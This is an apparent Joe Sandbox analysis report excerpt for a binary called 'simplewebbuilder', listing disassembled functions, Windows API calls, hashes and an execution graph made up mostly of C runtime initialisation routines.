                                                                                                                            Function 00406BD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$ByteCharMultiWide
                                                                                                                            • String ID: 7U@
                                                                                                                            • API String ID: 352835431-3990396050
                                                                                                                            • Opcode ID: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction ID: 3fc6234a2594f0c7c4f8fd7f4d61d5b765ea0d6a512059466152f22e4b19d7c1
                                                                                                                            • Opcode Fuzzy Hash: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                            • Instruction Fuzzy Hash: 2A112832900209ABDF228F94CE44ADEBBB6FF48350F154166FA61722A0D736CD71DB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040436C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction ID: ae1f0f37a1caea7582e622d33e18e97b99b5337afe9bfc2040585345cf76d9d0
                                                                                                                            • Opcode Fuzzy Hash: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                            • Instruction Fuzzy Hash: A4C012B0780701A2EA201BB02F0AB1622280B80F02F16243EAB8DF08C2CE7CD805A42D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403CF8 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual$FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 714016831-0
                                                                                                                            • Opcode ID: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction ID: 82e4f5ca211df2534f48b16e1633463362d6e61a1909367565888a0a16669b2c
                                                                                                                            • Opcode Fuzzy Hash: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                            • Instruction Fuzzy Hash: 2331E370601706ABE3308F24DD49B22BBA8EB48756F14463BE555BB7E1E778AD40CB4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406582 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406596
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                                            • Opcode ID: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction ID: ecf7deb6fed8900c4d79a36e1d1ce5f6dbda1fd4730ae83dc28ca19186aff87e
                                                                                                                            • Opcode Fuzzy Hash: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                            • Instruction Fuzzy Hash: 4D415B31000258AAEB119718DD99BFB3FE8DB01700F1505F6D547F71D2C37A49A4CB6A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B4C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
                                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.2389271332.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.2389271332.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3499195154-0
                                                                                                                            • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                            • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:84.3%
                                                                                                                            Signature Coverage:5.6%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:53
                                                                                                                            execution_graph 18434 4022e0 VirtualAlloc 18435 40d8ac 18434->18435 18436 402181 18441 9c430f 18436->18441 18439 402a2b 18442 9c431d 18441->18442 18443 9c4318 18441->18443 18447 9c4332 18442->18447 18455 9cbee1 18443->18455 18446 402183 Sleep 18446->18439 18448 9c433e CallCatchBlock 18447->18448 18449 9c43e9 CallCatchBlock 18448->18449 18452 9c438c ___DllMainCRTStartup 18448->18452 18459 9c419d 18448->18459 18449->18446 18451 9c419d __CRT_INIT@12 138 API calls 18451->18449 18452->18449 18453 9c419d __CRT_INIT@12 138 API calls 18452->18453 18454 9c43c6 18452->18454 18453->18454 18454->18449 18454->18451 18456 9cbf04 18455->18456 18457 9cbf11 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 18455->18457 18456->18457 18458 9cbf08 18456->18458 18457->18458 18458->18442 18460 9c41a9 CallCatchBlock 18459->18460 18461 9c422b 18460->18461 18462 9c41b1 18460->18462 18463 9c4294 18461->18463 18468 9c422f 18461->18468 18507 9c87e6 GetProcessHeap 18462->18507 18465 9c4299 18463->18465 18466 9c42f7 18463->18466 18639 9c97cb 18465->18639 18500 9c41ba CallCatchBlock __CRT_INIT@12 18466->18500 18667 9c6224 18466->18667 18467 9c41b6 18467->18500 18508 9c6394 18467->18508 18469 9c4250 18468->18469 18468->18500 18608 9c8a5b 18468->18608 18611 9c8932 RtlDecodePointer 18469->18611 18474 9c42a4 18474->18500 18642 9c906c 18474->18642 18476 9c41c6 __RTC_Initialize 18484 9c41d6 GetCommandLineA 18476->18484 18476->18500 18479 9c4266 __CRT_INIT@12 18635 9c427f 18479->18635 18481 9cbb7f __ioterm 60 API calls 18483 9c4261 18481->18483 18486 9c640a __mtterm 62 API calls 18483->18486 18529 9cbf80 GetEnvironmentStringsW 18484->18529 18486->18479 18488 9c42cd 18490 9c42eb 18488->18490 18491 9c42d3 18488->18491 18661 9c3574 18490->18661 18651 9c62e1 18491->18651 18495 9c41f0 18497 9c41f4 18495->18497 18561 9cbbd1 18495->18561 18496 9c42db GetCurrentThreadId 18496->18500 18594 9c640a 18497->18594 18500->18452 18502 9c4214 18502->18500 18603 9cbb7f 18502->18603 18507->18467 18675 9c8b02 RtlEncodePointer 18508->18675 18510 9c6399 18680 9c901e 18510->18680 18513 9c63a2 18515 9c640a __mtterm 62 API calls 18513->18515 18517 9c63a7 18515->18517 18517->18476 18518 9c63bf 18519 9c906c __calloc_crt 59 API calls 18518->18519 18520 9c63cc 18519->18520 18521 9c6401 18520->18521 18522 9c97ea __CRT_INIT@12 TlsSetValue 18520->18522 18523 9c640a __mtterm 62 API calls 18521->18523 18524 9c63e0 18522->18524 18525 9c6406 18523->18525 18524->18521 18526 9c63e6 18524->18526 18525->18476 18527 9c62e1 __initptd 59 API calls 18526->18527 18528 9c63ee GetCurrentThreadId 18527->18528 18528->18476 18530 9cbf93 WideCharToMultiByte 18529->18530 18535 9c41e6 18529->18535 18532 9cbffd FreeEnvironmentStringsW 18530->18532 18533 9cbfc6 18530->18533 18532->18535 18691 9c90b4 18533->18691 18542 9cb8cb 18535->18542 18537 9cbfd3 WideCharToMultiByte 18538 9cbfe9 18537->18538 18539 9cbff2 FreeEnvironmentStringsW 18537->18539 18540 9c3574 _free 59 API calls 18538->18540 18539->18535 18541 9cbfef 18540->18541 18541->18539 18543 9cb8d7 CallCatchBlock 18542->18543 18544 9c8eed __lock 59 API calls 18543->18544 18545 9cb8de 18544->18545 18546 9c906c __calloc_crt 59 API calls 18545->18546 18547 9cb8ef 18546->18547 18548 9cb95a GetStartupInfoW 18547->18548 18549 9cb8fa CallCatchBlock @_EH4_CallFilterFunc@8 18547->18549 18555 9cb96f 18548->18555 18556 9cba9e 18548->18556 18549->18495 18550 9cbb66 18944 9cbb76 18550->18944 18552 9c906c __calloc_crt 59 API calls 18552->18555 18553 9cbaeb GetStdHandle 18553->18556 18554 9cbafe GetFileType 18554->18556 18555->18552 18555->18556 18557 9cb9bd 18555->18557 18556->18550 18556->18553 18556->18554 18560 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 18556->18560 18557->18556 18558 9cb9f1 GetFileType 18557->18558 18559 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 18557->18559 18558->18557 18559->18557 18560->18556 18562 9cbbdf 18561->18562 18563 9cbbe4 GetModuleFileNameA 18561->18563 18954 9c588a 18562->18954 18565 9cbc11 18563->18565 18948 9cbc84 18565->18948 18568 9c90b4 __malloc_crt 59 API calls 18569 9cbc4a 18568->18569 18570 9cbc84 _parse_cmdline 59 API calls 18569->18570 18571 9c4200 18569->18571 18570->18571 18571->18502 18572 9cbe00 18571->18572 18573 9cbe0e _strlen 18572->18573 18574 9cbe09 18572->18574 18576 9c4209 18573->18576 18577 9c906c __calloc_crt 59 API calls 18573->18577 18575 9c588a ___initmbctable 71 API calls 18574->18575 18575->18573 18576->18502 18588 9c8a6a 18576->18588 18584 9cbe44 _strlen 18577->18584 18578 9cbe96 18579 9c3574 _free 59 API calls 18578->18579 18579->18576 18580 9c906c __calloc_crt 59 API calls 18580->18584 18581 9cbebd 18582 9c3574 _free 59 API calls 18581->18582 18582->18576 18584->18576 18584->18578 18584->18580 18584->18581 18585 9cbed4 18584->18585 19118 9c72bc 18584->19118 18586 9c5505 __invoke_watson 8 API calls 18585->18586 18587 9cbee0 18586->18587 18590 9c8a76 __IsNonwritableInCurrentImage 18588->18590 19127 9cd8df 18590->19127 18591 9c8a94 __initterm_e 18593 9c8ab3 _doexit __IsNonwritableInCurrentImage 18591->18593 19130 9c39a4 18591->19130 18593->18502 18595 9c6414 18594->18595 18597 9c641a 18594->18597 19196 9c97ac 18595->19196 18598 9c8f37 RtlDeleteCriticalSection 18597->18598 18599 9c8f53 18597->18599 18600 9c3574 _free 59 API calls 18598->18600 18601 9c8f5f RtlDeleteCriticalSection 18599->18601 18602 9c8f72 18599->18602 18600->18597 18601->18599 18602->18500 18605 9cbb86 18603->18605 18604 9cbbce 18604->18497 18605->18604 18606 9c3574 _free 59 API calls 18605->18606 18607 9cbb9f RtlDeleteCriticalSection 18605->18607 18606->18605 18607->18605 18609 9c8ba4 _doexit 59 API calls 18608->18609 18610 9c8a66 18609->18610 18610->18469 18612 9c894c 18611->18612 18613 9c895e 18611->18613 18612->18613 18615 9c3574 _free 59 API calls 18612->18615 18614 9c3574 _free 59 API calls 18613->18614 18616 9c896b 18614->18616 18615->18612 18617 9c898f 18616->18617 18620 9c3574 _free 59 API calls 18616->18620 18618 9c3574 _free 59 API calls 18617->18618 18619 9c899b 18618->18619 18621 9c3574 _free 59 API calls 18619->18621 18620->18616 18622 9c89ac 18621->18622 18623 9c3574 _free 59 API calls 18622->18623 18624 9c89b7 18623->18624 18625 9c89dc RtlEncodePointer 18624->18625 18627 9c3574 _free 59 API calls 18624->18627 18626 9c89f1 18625->18626 18631 9c89f7 18625->18631 18628 9c3574 _free 59 API calls 18626->18628 18630 9c89db 18627->18630 18628->18631 18629 9c3574 _free 59 API calls 18632 9c8a0d 18629->18632 18630->18625 18631->18629 18631->18632 18633 9c3574 _free 59 API calls 18632->18633 18634 9c4255 18632->18634 18633->18634 18634->18479 18634->18481 18636 9c4291 18635->18636 18637 9c4283 18635->18637 18636->18500 18637->18636 18638 9c640a __mtterm 62 API calls 18637->18638 18638->18636 18640 9c97de 18639->18640 18641 9c97e2 TlsGetValue 18639->18641 18640->18474 18641->18474 18643 9c9073 18642->18643 18645 9c42b5 18643->18645 18647 9c9091 18643->18647 19199 9d0ab8 18643->19199 18645->18500 18648 9c97ea 18645->18648 18647->18643 18647->18645 19207 9c9b05 Sleep 18647->19207 18649 9c9804 TlsSetValue 18648->18649 18650 9c9800 18648->18650 18649->18488 18650->18488 18652 9c62ed CallCatchBlock 18651->18652 18653 9c8eed __lock 59 API calls 18652->18653 18654 9c632a 18653->18654 19208 9c6382 18654->19208 18657 9c8eed __lock 59 API calls 18658 9c634b ___addlocaleref 18657->18658 19211 9c638b 18658->19211 18660 9c6376 CallCatchBlock 18660->18496 18662 9c357d HeapFree 18661->18662 18666 9c35a6 _free 18661->18666 18663 9c3592 18662->18663 18662->18666 18664 9c645b strtoxl 57 API calls 18663->18664 18665 9c3598 GetLastError 18664->18665 18665->18666 18666->18500 18668 9c6231 18667->18668 18674 9c6257 18667->18674 18669 9c623f 18668->18669 18670 9c97cb __CRT_INIT@12 TlsGetValue 18668->18670 18671 9c97ea __CRT_INIT@12 TlsSetValue 18669->18671 18670->18669 18672 9c624f 18671->18672 19216 9c60ef 18672->19216 18674->18500 18676 9c8b13 __init_pointers __initp_misc_winsig 18675->18676 18687 9c4007 RtlEncodePointer 18676->18687 18678 9c8b2b __init_pointers 18679 9c987a 34 API calls 18678->18679 18679->18510 18683 9c902a 18680->18683 18681 9c639e 18681->18513 18684 9c978e 18681->18684 18683->18681 18688 9c980c 18683->18688 18685 9c63b4 18684->18685 18686 9c97a5 TlsAlloc 18684->18686 18685->18513 18685->18518 18687->18678 18689 9c981c 18688->18689 18690 9c9829 InitializeCriticalSectionAndSpinCount 18688->18690 18689->18683 18690->18683 18694 9c90c2 18691->18694 18693 9c90f4 18693->18532 18693->18537 18694->18693 18696 9c35ac 18694->18696 18713 9c9b05 Sleep 18694->18713 18697 9c3627 18696->18697 18705 9c35b8 18696->18705 18698 9c8803 _malloc RtlDecodePointer 18697->18698 18699 9c362d 18698->18699 18701 9c645b strtoxl 58 API calls 18699->18701 18703 9c361f 18701->18703 18702 9c35eb RtlAllocateHeap 18702->18703 18702->18705 18703->18694 18705->18702 18706 9c3613 18705->18706 18707 9c35c3 18705->18707 18711 9c3611 18705->18711 18761 9c8803 RtlDecodePointer 18705->18761 18763 9c645b 18706->18763 18707->18705 18714 9c8cd3 18707->18714 18723 9c8d30 18707->18723 18758 9c891c 18707->18758 18712 9c645b strtoxl 58 API calls 18711->18712 18712->18703 18713->18694 18766 9d077e 18714->18766 18716 9c8cda 18717 9d077e __FF_MSGBANNER 59 API calls 18716->18717 18719 9c8ce7 18716->18719 18717->18719 18718 9c8d30 __NMSG_WRITE 59 API calls 18720 9c8cff 18718->18720 18719->18718 18721 9c8d09 18719->18721 18722 9c8d30 __NMSG_WRITE 59 API calls 18720->18722 18721->18707 18722->18721 18724 9c8d4e __NMSG_WRITE 18723->18724 18726 9d077e __FF_MSGBANNER 55 API calls 18724->18726 18757 9c8e75 18724->18757 18728 9c8d61 18726->18728 18727 9c8ede 18727->18707 18729 9c8e7a GetStdHandle 18728->18729 18730 9d077e __FF_MSGBANNER 55 API calls 18728->18730 18733 9c8e88 _strlen 18729->18733 18729->18757 18731 9c8d72 18730->18731 18731->18729 18732 9c8d84 18731->18732 18732->18757 18782 9cfb3d 18732->18782 18736 9c8ec1 WriteFile 18733->18736 18733->18757 18736->18757 18737 9c8db1 GetModuleFileNameW 18739 9c8dd1 18737->18739 18746 9c8de1 __NMSG_WRITE 18737->18746 18738 9c8ee2 18841 9c5505 IsProcessorFeaturePresent 18738->18841 18741 9cfb3d __NMSG_WRITE 55 API calls 18739->18741 18741->18746 18743 9c8f11 RtlEnterCriticalSection 18743->18707 18744 9c8e27 18744->18738 18800 9cfad1 18744->18800 18746->18738 18746->18744 18791 9cfbb2 18746->18791 18748 9c8f04 18748->18743 18869 9c8a3f 18748->18869 18751 9cfad1 __NMSG_WRITE 55 API calls 18753 9c8e5e 18751->18753 18753->18738 18755 9c8e65 18753->18755 18809 9d07be RtlEncodePointer 18755->18809 18834 9c4b4b 18757->18834 18927 9c88e8 GetModuleHandleExW 18758->18927 18762 9c8816 18761->18762 18762->18705 18930 9c6272 GetLastError 18763->18930 18765 9c6460 18765->18711 18767 9d0788 18766->18767 18768 9c645b strtoxl 59 API calls 18767->18768 18769 9d0792 18767->18769 18770 9d07ae 18768->18770 18769->18716 18773 9c54f5 18770->18773 18776 9c54ca RtlDecodePointer 18773->18776 18777 9c54dd 18776->18777 18778 9c5505 __invoke_watson 8 API calls 18777->18778 18779 9c54f4 18778->18779 18780 9c54ca strtoxl 8 API calls 18779->18780 18781 9c5501 18780->18781 18781->18716 18783 9cfb48 18782->18783 18784 9cfb56 18782->18784 18783->18784 18787 9cfb6f 18783->18787 18785 9c645b strtoxl 59 API calls 18784->18785 18790 9cfb60 18785->18790 18786 9c54f5 strtoxl 9 API calls 18788 9c8da4 18786->18788 18787->18788 18789 9c645b strtoxl 59 API calls 18787->18789 18788->18737 18788->18738 18789->18790 18790->18786 18795 9cfbc0 18791->18795 18792 9cfbc4 18793 9c645b strtoxl 59 API calls 18792->18793 18794 9cfbc9 18792->18794 18799 9cfbf4 18793->18799 18794->18744 18795->18792 18795->18794 18797 9cfc03 18795->18797 18796 9c54f5 strtoxl 9 API calls 18796->18794 18797->18794 18798 9c645b strtoxl 59 API calls 18797->18798 18798->18799 18799->18796 18801 9cfadd 18800->18801 18802 9cfaeb 18800->18802 18801->18802 18806 9cfb17 18801->18806 18803 9c645b strtoxl 59 API calls 18802->18803 18808 9cfaf5 18803->18808 18804 9c54f5 strtoxl 9 API calls 18805 9c8e47 18804->18805 18805->18738 18805->18751 18806->18805 18807 9c645b strtoxl 59 API calls 18806->18807 18807->18808 18808->18804 18810 9d07f2 ___crtIsPackagedApp 18809->18810 18811 9d08b1 IsDebuggerPresent 18810->18811 18812 9d0801 LoadLibraryExW 18810->18812 18813 9d08bb 18811->18813 18814 9d08d6 18811->18814 18815 9d083e GetProcAddress 18812->18815 18816 9d0818 GetLastError 18812->18816 18817 9d08c9 18813->18817 18818 9d08c2 OutputDebugStringW 18813->18818 18814->18817 18819 9d08db RtlDecodePointer 18814->18819 18821 9d0852 7 API calls 18815->18821 18822 9d08ce 18815->18822 18820 9d0827 LoadLibraryExW 18816->18820 18816->18822 18817->18822 18823 9d091a 18817->18823 18828 9d0902 RtlDecodePointer RtlDecodePointer 18817->18828 18818->18817 18819->18822 18820->18815 18820->18822 18824 9d08ae 18821->18824 18825 9d089a GetProcAddress RtlEncodePointer 18821->18825 18826 9c4b4b ___strgtold12_l 6 API calls 18822->18826 18827 9d0952 RtlDecodePointer 18823->18827 18833 9d093e RtlDecodePointer 18823->18833 18824->18811 18825->18824 18829 9d09a0 18826->18829 18831 9d0959 18827->18831 18827->18833 18828->18823 18829->18757 18832 9d096a RtlDecodePointer 18831->18832 18831->18833 18832->18833 18833->18822 18835 9c4b55 IsProcessorFeaturePresent 18834->18835 18836 9c4b53 18834->18836 18838 9c9b8f 18835->18838 18836->18727 18876 9c9b3e IsDebuggerPresent 18838->18876 18842 9c5510 18841->18842 18884 9c5398 18842->18884 18846 9c552b 18846->18743 18847 9c8f75 18846->18847 18848 9c8f81 CallCatchBlock 18847->18848 18849 9c8fa0 18848->18849 18850 9c8cd3 __FF_MSGBANNER 59 API calls 18848->18850 18851 9c90b4 __malloc_crt 59 API calls 18849->18851 18858 9c8fc3 CallCatchBlock 18849->18858 18852 9c8f8f 18850->18852 18854 9c8fb7 18851->18854 18853 9c8d30 __NMSG_WRITE 59 API calls 18852->18853 18855 9c8f96 18853->18855 18856 9c8fcd 18854->18856 18857 9c8fbe 18854->18857 18859 9c891c _malloc 3 API calls 18855->18859 18893 9c8eed 18856->18893 18860 9c645b strtoxl 59 API calls 18857->18860 18858->18748 18859->18849 18860->18858 18862 9c8fd4 18863 9c8ff9 18862->18863 18864 9c8fe1 18862->18864 18865 9c3574 _free 59 API calls 18863->18865 18866 9c980c __mtinitlocks InitializeCriticalSectionAndSpinCount 18864->18866 18867 9c8fed 18865->18867 18866->18867 18900 9c9015 18867->18900 18870 9c8cd3 __FF_MSGBANNER 59 API calls 18869->18870 18871 9c8a47 18870->18871 18872 9c8d30 __NMSG_WRITE 59 API calls 18871->18872 18873 9c8a4f 18872->18873 18904 9c8aee 18873->18904 18877 9c9b53 __call_reportfault 18876->18877 18882 9c9b28 SetUnhandledExceptionFilter UnhandledExceptionFilter 18877->18882 18879 9c9b5b __call_reportfault 18883 9c9b13 GetCurrentProcess TerminateProcess 18879->18883 18881 9c9b78 18881->18727 18882->18879 18883->18881 18885 9c53b2 _memset __call_reportfault 18884->18885 18886 9c53d2 IsDebuggerPresent 18885->18886 18892 9c9b28 SetUnhandledExceptionFilter UnhandledExceptionFilter 18886->18892 18888 9c4b4b ___strgtold12_l 6 API calls 18890 9c54b9 18888->18890 18889 9c5496 __call_reportfault 18889->18888 18891 9c9b13 GetCurrentProcess TerminateProcess 18890->18891 18891->18846 18892->18889 18894 9c8efe 18893->18894 18895 9c8f11 RtlEnterCriticalSection 18893->18895 18896 9c8f75 __mtinitlocknum 58 API calls 18894->18896 18895->18862 18897 9c8f04 18896->18897 18897->18895 18898 9c8a3f __amsg_exit 58 API calls 18897->18898 18899 9c8f10 18898->18899 18899->18895 18903 9c9057 RtlLeaveCriticalSection 18900->18903 18907 9c8ba4 18904->18907 18908 9c8bb0 CallCatchBlock 18907->18908 18909 9c8eed __lock 52 API calls 18908->18909 18928 9c8913 ExitProcess 18927->18928 18929 9c8901 GetProcAddress 18927->18929 18929->18928 18931 9c97cb __CRT_INIT@12 TlsGetValue 18930->18931 18932 9c6287 18931->18932 18933 9c62d5 SetLastError 18932->18933 18934 9c906c __calloc_crt 56 API calls 18932->18934 18933->18765 18935 9c629a 18934->18935 18935->18933 18936 9c97ea __CRT_INIT@12 TlsSetValue 18935->18936 18937 9c62ae 18936->18937 18938 9c62cc 18937->18938 18939 9c62b4 18937->18939 18941 9c3574 _free 56 API calls 18938->18941 18940 9c62e1 __initptd 56 API calls 18939->18940 18942 9c62bc GetCurrentThreadId 18940->18942 18943 9c62d2 18941->18943 18942->18933 18943->18933 18947 9c9057 RtlLeaveCriticalSection 18944->18947 18946 9cbb7d 18946->18549 18947->18946 18950 9cbca6 18948->18950 18953 9cbd0a 18950->18953 18958 9d1bd6 18950->18958 18951 9cbc27 18951->18568 18951->18571 18952 9d1bd6 _parse_cmdline 59 API calls 18952->18953 18953->18951 18953->18952 18955 9c589a 18954->18955 18956 9c5893 18954->18956 18955->18563 19014 9c5be7 18956->19014 18961 9d1b7c 18958->18961 18964 9c287b 18961->18964 18965 9c288c 18964->18965 18969 9c28d9 18964->18969 18972 9c625a 18965->18972 18967 9c2892 18968 9c28b9 18967->18968 18977 9c57bf 18967->18977 18968->18969 18992 9c5b41 18968->18992 18969->18950 18973 9c6272 __getptd_noexit 59 API calls 18972->18973 18974 9c6260 18973->18974 18975 9c626d 18974->18975 18976 9c8a3f __amsg_exit 59 API calls 18974->18976 18975->18967 18976->18975 18978 9c57cb CallCatchBlock 18977->18978 18979 9c625a CallCatchBlock 59 API calls 18978->18979 18980 9c57d4 18979->18980 18981 9c5803 18980->18981 18983 9c57e7 18980->18983 18982 9c8eed __lock 59 API calls 18981->18982 18984 9c580a 18982->18984 18985 9c625a CallCatchBlock 59 API calls 18983->18985 19004 9c583f 18984->19004 18987 9c57ec 18985->18987 18990 9c8a3f __amsg_exit 59 API calls 18987->18990 18991 9c57fa CallCatchBlock 18987->18991 18990->18991 18991->18968 18993 9c5b4d CallCatchBlock 18992->18993 18994 9c625a CallCatchBlock 59 API calls 18993->18994 18995 9c5b57 18994->18995 18996 9c8eed __lock 59 API calls 18995->18996 19001 9c5b69 18995->19001 18997 9c5b87 18996->18997 19002 9c3574 _free 59 API calls 18997->19002 19003 9c5bb4 18997->19003 18999 9c8a3f __amsg_exit 59 API calls 19000 9c5b77 CallCatchBlock 18999->19000 19000->18969 19001->18999 19001->19000 19002->19003 19011 9c5bde 19003->19011 19005 9c584a ___addlocaleref ___removelocaleref 19004->19005 19007 9c581e 19004->19007 19006 9c55c5 ___freetlocinfo 59 API calls 19005->19006 19005->19007 19006->19007 19008 9c5836 19007->19008 19009 9c9057 _doexit RtlLeaveCriticalSection 19008->19009 19010 9c583d 19009->19010 19010->18987 19012 9c9057 _doexit RtlLeaveCriticalSection 19011->19012 19013 9c5be5 19012->19013 19013->19001 19015 9c5bf3 CallCatchBlock 19014->19015 19016 9c625a CallCatchBlock 59 API calls 19015->19016 19017 9c5bfb 19016->19017 19018 9c5b41 _LocaleUpdate::_LocaleUpdate 59 API calls 19017->19018 19019 9c5c05 19018->19019 19039 9c58e2 19019->19039 19022 9c90b4 __malloc_crt 59 API calls 19024 9c5c27 19022->19024 19023 9c5d54 CallCatchBlock 19023->18955 19024->19023 19046 9c5d8f 19024->19046 19027 9c5c5d 19029 9c5c7d 19027->19029 19031 9c3574 _free 59 API calls 19027->19031 19028 9c5d64 19028->19023 19030 9c5d77 19028->19030 19032 9c3574 _free 59 API calls 19028->19032 